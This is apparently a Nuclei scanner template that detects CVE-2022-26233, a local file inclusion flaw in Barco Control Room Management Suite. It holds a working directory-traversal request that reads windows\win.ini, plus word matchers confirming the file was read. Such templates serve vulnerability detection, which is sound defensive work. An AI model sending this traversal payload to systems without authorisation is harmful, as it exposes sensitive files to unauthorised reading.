id: CVE-2022-26233

info:
  name: Barco Control Room Management Suite <=2.9 Build 0275 - Local File Inclusion
  author: 0x_Akoko
  severity: high
  description: Barco Control Room Management through Suite 2.9 Build 0275 is vulnerable to local file inclusion that could allow attackers to access sensitive information and components. Requests must begin with the "GET /..\.." substring.
  reference:
    - https://0day.today/exploit/37579
    - http://seclists.org/fulldisclosure/2022/Apr/0
    - http://packetstormsecurity.com/files/166577/Barco-Control-Room-Management-Suite-Directory-Traversal.html
    - https://nvd.nist.gov/vuln/detail/CVE-2022-26233
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 7.5
    cve-id: CVE-2022-26233
    cwe-id: CWE-22
    epss-score: 0.00413
    cpe: cpe:2.3:a:barco:control_room_management_suite:*:*:*:*:*:*:*:*
  metadata:
    max-request: 1
    vendor: barco
    product: control_room_management_suite
  tags: cve,cve2022,barco,lfi,seclists,packetstorm

http:
  - raw:
      - |+
        GET /..\..\..\..\..\..\..\..\..\..\windows\win.ini HTTP/1.1
        Host: {{Hostname}}

    unsafe: true
    matchers:
      - type: word
        part: body
        words:
          - "bit app support"
          - "fonts"
          - "extensions"
        condition: and